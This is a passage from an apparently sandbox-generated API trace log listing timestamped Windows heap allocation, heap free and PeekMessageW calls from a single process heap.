(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.519] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.519] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.520] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.520] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd360 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0173.520] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd990 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0173.521] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.521] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.522] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.522] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8d0 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdab0 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5a0 [0173.522] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd990 [0173.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8b8 [0173.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0173.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd360 [0173.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0173.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0173.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0173.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0173.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.524] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.524] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.525] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.525] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0173.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0173.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.526] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0173.526] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0173.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0173.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0173.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0173.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0173.527] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0173.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0173.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0173.543] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0173.543] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 